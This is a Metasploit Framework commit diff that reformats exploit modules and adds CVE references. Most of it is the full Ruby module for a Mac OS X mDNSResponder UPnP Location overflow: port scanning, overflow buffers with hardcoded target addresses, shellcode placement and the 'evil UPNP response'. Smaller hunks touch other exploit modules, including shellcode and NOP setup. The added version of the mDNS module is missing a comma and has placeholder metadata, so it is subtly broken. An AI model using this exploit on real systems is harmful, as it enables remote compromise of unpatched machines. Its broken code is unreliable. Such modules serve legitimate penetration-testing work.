some cleanups, added some CVE references

git-svn-id: file:///home/svn/framework3/trunk@8304 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/osx/mdns/upnp_location.rb

@@ -1,201 +1,226 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-  include Exploit::Remote::Udp
 
-  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',
-      'Platform' => 'osx',
-      'DefaultOptions' => { 
-        'SRVPORT' => 1900,
-        'RPORT' => 0
-      },
-      'Targets' => [
-        [ '10.4.8 x86', { # mDNSResponder-108.2
-          'Arch'                   => ARCH_X86,
+	include Exploit::Remote::Udp
 
-          # Offset to mDNSStorage structure
-          'Offset'                 => 21000,
-          'Magic'                  => 0x8fe510a0,
-          'g_szRouterHostPortDesc' => 0x53dc0,
-          }
-        ],
-        [ '10.4.0 PPC', { # mDNSResponder-107
-          'Arch'    => ARCH_PPC,
-          'Offset'  => 21000,
-          'Magic'   => 0x8fe51f4c,
-          'Ret'     => 0x8fe41af8,
-          }
-        ],
-      ],
-      'DefaultTarget' => 1,
+	def initialize(info = {})
+		super(update_info(info,
+			'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',
+			'Description'    => %q{
+				TODO
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'TBD'
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+				],
+			'DefaultOptions' =>
+				{
+					'SRVPORT' => 1900,
+					'RPORT' => 0
+				},
+			'Payload' =>
+				{
+					'BadChars' => "\x00\x3a\x2f",
+					'StackAdjustment' => 0,
+					'Space' => 468
+				}
+			'Platform' => 'osx',
+			'Targets' =>
+				[
+					[ '10.4.8 x86',
+						{ # mDNSResponder-108.2
+							'Arch'                   => ARCH_X86,
+							# Offset to mDNSStorage structure
+							'Offset'                 => 21000,
+							'Magic'                  => 0x8fe510a0,
+							'g_szRouterHostPortDesc' => 0x53dc0,
+						}
+					],
+					[ '10.4.0 PPC',
+						{ # mDNSResponder-107
+							'Arch'    => ARCH_PPC,
+							'Offset'  => 21000,
+							'Magic'   => 0x8fe51f4c,
+							'Ret'     => 0x8fe41af8,
+						}
+					],
+				],
+			'DefaultTarget' => 1))
 
-      'Payload' => {
-        'BadChars' => "\x00\x3a\x2f",
-        'StackAdjustment' => 0,
-        'Space' => 468
-      }
-    ))
+		register_options([
+			Opt::LHOST(),
+			OptPort.new('SRVPORT',
+				[ true, "The UPNP server port to listen on", 1900 ])
+			], self.class)
 
-    register_options([
-      Opt::LHOST(),
-      OptPort.new('SRVPORT', 
-        [true, "The UPNP server port to listen on", 1900])
-    ], self.class)
-      
-    @mutex = Mutex.new()
-    @found_upnp_port = false
-    @key_to_port = Hash.new()
-    @upnp_port = 0
-    @client_socket = nil
-  end
-  
-  def check
-    #
-    # TODO: Listen on two service ports, one a single character
-    # shorter than the other (i.e 1900 and 19000).  If the copy was
-    # truncated by strlcpy, it will connect to the service listening
-    # on the shorter port number.
-    #
-    upnp_port = scan_for_upnp_port()
-    if (upnp_port > 0)
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Unsupported
-    end
-  end
-  
-  def upnp_server(server)
-    client = server.accept()
-    request = client.readline()
-    if (request =~ /GET \/([\da-f]+).xml/)
-      @mutex.synchronize { 
-        @found_upnp_port = true
-        @upnp_port = @key_to_port[$1]
-        
-        # Important: Keep the client connection open
-        @client_socket = client
-      }
-    end
-  end
-  
-  def scan_for_upnp_port
-    @upnp_port = 0
-    @found_upnp_port = false
-    
-    upnp_port = 0
-    
-    # XXX: Do this in a more Metasploit-y way
-    server = TCPServer.open(1900)
-    server_thread = Thread.new { self.upnp_server(server) }
-    
-    begin
-      socket = Rex::Socket.create_udp
-      
-      upnp_location = 
-        "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
-      
-      puts "[*] Listening for UPNP requests on: #{upnp_location}"
-      puts "[*] Sending UPNP Discovery replies..."
-      
-      i = 49152;
-      while i < 65536 && @mutex.synchronize { @found_upnp_port == false }
-        key = sprintf("%.2x%.2x%.2x%.2x%.2x",
-                      rand(255), rand(255), rand(255), rand(255), rand(255))
-        
-        @mutex.synchronize { 
-          @key_to_port[key] = i
-        }
-        
-        upnp_reply =
-          "HTTP/1.1 200 Ok\r\n" +
-          "ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
-          "USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\r\n" +
-          "Location: #{upnp_location}/#{key}.xml\r\n\r\n"
-        
-        socket.sendto(upnp_reply, datastore['RHOST'], i)
-        
-        i += 1
-      end
-      
-      @mutex.synchronize { 
-        if (@found_upnp_port)
-          upnp_port = @upnp_port
-        end
-      }
-    ensure
-      server.close
-      server_thread.join
-    end
-    
-    return upnp_port
-  end
-  
-  def exploit
-    #
-    # It is very important that we scan for the upnp port.  We must
-    # receive the TCP connection and hold it open, otherwise the
-    # code path that uses the overwritten function pointer most
-    # likely won't be used.  Holding this connection increases the
-    # chance that the code path will be used dramatically.
-    #
-    upnp_port = scan_for_upnp_port()
-    
-    if upnp_port == 0
-      raise "Could not find listening UPNP UDP socket"
-    end
-    
-    datastore['RPORT'] = upnp_port
-    
-    socket = connect_udp()
-    
-    if (target['Arch'] == ARCH_X86)
-      space = "A" * target['Offset']
-      space[0, payload.encoded.length] = payload.encoded
-      
-      pattern = Rex::Text.pattern_create(47)
-      pattern[20, 4] = [target['Magic']].pack('V')
-      pattern[44, 3] = [target['g_szRouterHostPortDesc']].pack('V')[0..2]
-      
-      boom = space + pattern
-      usn = ""
-      
-    elsif (target['Arch'] == ARCH_PPC)
-      space = "A" * target['Offset']
-      
-      pattern = Rex::Text.pattern_create(48)
-      pattern[20, 4] = [target['Magic']].pack('N')
-      
-      #
-      # r26, r27, r30, r31 point to g_szUSN+556
-      # Ret should be a branch to one of these registers
-      # And we make sure to put our payload in the USN header
-      #
-      pattern[44, 4] = [target['Ret']].pack('N')
-      
-      boom = space + pattern
-      
-      #
-      # Start payload at offset 556 within USN
-      #
-      usn = "A" * 556 + payload.encoded
-    end
-    
-    upnp_reply =
-      "HTTP/1.1 200 Ok\r\n" +
-      "ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
-      "USN: #{usn}\r\n" +
-      "Location: http://#{boom}\r\n\r\n"
-    
-    puts "[*] Sending evil UPNP response"
-    socket.put(upnp_reply)
-    
-    puts "[*] Sleeping to give mDNSDaemonIdle() a chance to run"
-    sleep(10)
-    
-    handler()
-    disconnect_udp()
-  end
+		@mutex = Mutex.new()
+		@found_upnp_port = false
+		@key_to_port = Hash.new()
+		@upnp_port = 0
+		@client_socket = nil
+	end
+
+	def check
+		#
+		# TODO: Listen on two service ports, one a single character
+		# shorter than the other (i.e 1900 and 19000).  If the copy was
+		# truncated by strlcpy, it will connect to the service listening
+		# on the shorter port number.
+		#
+		upnp_port = scan_for_upnp_port()
+		if (upnp_port > 0)
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Unsupported
+		end
+	end
+
+	def upnp_server(server)
+		client = server.accept()
+		request = client.readline()
+		if (request =~ /GET \/([\da-f]+).xml/)
+			@mutex.synchronize {
+				@found_upnp_port = true
+				@upnp_port = @key_to_port[$1]
+
+				# Important: Keep the client connection open
+				@client_socket = client
+			}
+		end
+	end
+
+	def scan_for_upnp_port
+		@upnp_port = 0
+		@found_upnp_port = false
+
+		upnp_port = 0
+
+		# XXX: Do this in a more Metasploit-y way
+		server = TCPServer.open(1900)
+		server_thread = Thread.new { self.upnp_server(server) }
+
+		begin
+			socket = Rex::Socket.create_udp
+
+			upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
+
+			puts "[*] Listening for UPNP requests on: #{upnp_location}"
+			puts "[*] Sending UPNP Discovery replies..."
+
+			i = 49152;
+			while i < 65536 && @mutex.synchronize {
+				@found_upnp_port == false
+			}
+			key = sprintf("%.2x%.2x%.2x%.2x%.2x",
+				rand(255), rand(255), rand(255), rand(255), rand(255))
+
+			@mutex.synchronize {
+				@key_to_port[key] = i
+			}
+
+			upnp_reply = "HTTP/1.1 200 Ok\r\n" +
+				"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
+				"USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\r\n" +
+				"Location: #{upnp_location}/#{key}.xml\r\n\r\n"
+
+			socket.sendto(upnp_reply, datastore['RHOST'], i)
+
+			i += 1
+		end
+
+		@mutex.synchronize {
+			if (@found_upnp_port)
+				upnp_port = @upnp_port
+			end
+		}
+		ensure
+			server.close
+			server_thread.join
+		end
+
+		return upnp_port
+	end
+
+	def exploit
+		#
+		# It is very important that we scan for the upnp port.  We must
+		# receive the TCP connection and hold it open, otherwise the
+		# code path that uses the overwritten function pointer most
+		# likely won't be used.  Holding this connection increases the
+		# chance that the code path will be used dramatically.
+		#
+		upnp_port = scan_for_upnp_port()
+
+		if upnp_port == 0
+			raise "Could not find listening UPNP UDP socket"
+		end
+
+		datastore['RPORT'] = upnp_port
+
+		socket = connect_udp()
+
+		if (target['Arch'] == ARCH_X86)
+			space = "A" * target['Offset']
+			space[0, payload.encoded.length] = payload.encoded
+
+			pattern = Rex::Text.pattern_create(47)
+			pattern[20, 4] = [target['Magic']].pack('V')
+			pattern[44, 3] = [target['g_szRouterHostPortDesc']].pack('V')[0..2]
+
+			boom = space + pattern
+			usn = ""
+
+		elsif (target['Arch'] == ARCH_PPC)
+			space = "A" * target['Offset']
+
+			pattern = Rex::Text.pattern_create(48)
+			pattern[20, 4] = [target['Magic']].pack('N')
+
+			#
+			# r26, r27, r30, r31 point to g_szUSN+556
+			# Ret should be a branch to one of these registers
+			# And we make sure to put our payload in the USN header
+			#
+			pattern[44, 4] = [target['Ret']].pack('N')
+
+			boom = space + pattern
+
+			#
+			# Start payload at offset 556 within USN
+			#
+			usn = "A" * 556 + payload.encoded
+		end
+
+		upnp_reply = "HTTP/1.1 200 Ok\r\n" +
+      	"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n" +
+			"USN: #{usn}\r\n" +
+			"Location: http://#{boom}\r\n\r\n"
+
+		puts "[*] Sending evil UPNP response"
+		socket.put(upnp_reply)
+
+		puts "[*] Sleeping to give mDNSDaemonIdle() a chance to run"
+		sleep(10)
+
+		handler()
+		disconnect_udp()
+	end
 end

modules/exploits/unix/misc/zabbix_agent_exec.rb

@@ -9,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
 
-
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
@@ -26,13 +24,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
 			can only be exploited if the attacker can hijack the IP address
 			of an authorized server (as defined in the configuration file).
-					
 			},
 			'Author'         => [ 'hdm' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'CVE', '2009-4502' ],
 					[ 'OSVDB', '60956' ],
 					[ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
 				],

modules/exploits/windows/browser/ie_unsafe_scripting.rb

@@ -1,5 +1,5 @@
 ##
-#
+# $Id$
 ##
 
 ##

modules/exploits/windows/fileformat/activepdf_webgrabber.rb

@@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     => 
 				[
-					[ 'URL', 'http://www.metasploit.com' ],
 					[ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
 				],
 			'DefaultOptions' =>

modules/exploits/windows/fileformat/etrust_pestscan.rb

@@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/projects/Framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
 
 require 'msf/core'
 
@@ -17,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'CA eTrust PestPatrol ActiveX Control Buffer Overflow',
 			'Description'    => %q{
 				This module exploits a stack overflow in CA eTrust PestPatrol. When
-				sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) 
+				sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
 				an attacker may be able to execute arbitrary code.
 			},
 			'License'        => MSF_LICENSE,
-			'Author'         => [ 'MC' ], 
+			'Author'         => [ 'MC' ],
 			'Version'        => '$Revision$',
-			'References'     => 
+			'References'     =>
 				[
-					[ 'URL', 'http://www.metasploit.com' ],
+					[ 'CVE', '2009-4225' ],
 					[ 'URL', 'http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm' ],
 				],
 			'DefaultOptions' =>
@@ -40,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]	
+					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
 				],
 			'DisclosureDate' => 'Jun 5 2007',
 			'DefaultTarget'  => 0))
@@ -51,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				], self.class)
 	end
 
-	def exploit 
+	def exploit
 		# Encode the shellcode.
 		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Create some nops.	
+
+		# Create some nops.
 		nops    = Rex::Text.to_unescape(make_nops(4))
-	
+
 		# Set the return.
 		ret     = Rex::Text.uri_encode([target.ret].pack('L'))
 

modules/exploits/windows/fileformat/ideal_administration_2009_ipj.rb

@@ -1,9 +1,13 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
 
 require 'msf/core'
 
@@ -25,8 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'CVE', '2009-4265' ],
 					[ 'OSVDB', '60681' ],
-					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ]
 				],
 			'DefaultOptions' =>
 				{

modules/exploits/windows/fileformat/vuplayer_cue.rb

@@ -1,5 +1,5 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
 
 	include Msf::Exploit::FILEFORMAT
-        
+
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'VUPlayer CUE Buffer Overflow',
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
-				},					
+				},
 			'Payload'        =>
 				{
 					'Space'    => 750,
@@ -39,18 +39,18 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops'  =>  'True',
 				},
 			'Platform' => 'win',
-			'Targets'        => 
+			'Targets'        =>
 				[
-					[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], 
+					[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Aug 18 2009',
 			'DefaultTarget'  => 0))
 
-                        register_options(
-                                [
-                                        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.cue']),
-                                ], self.class)
+		register_options(
+			[
+				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.cue']),
+			], self.class)
 
 	end
 
@@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		cue << ".BIN""\"" + " BINARY\r\n"
 		cue << "TRACK 01 MODE1/22352\r\n"
 		cue << "INDEX 01 00:00:00\r\n"
- 	
+
 		print_status("Creating '#{datastore['FILENAME']}' file ...")
 
 		file_create(cue)
-		
+
 	end
 
 end

modules/exploits/windows/misc/poppeeper_uidl.rb

@@ -1,5 +1,5 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/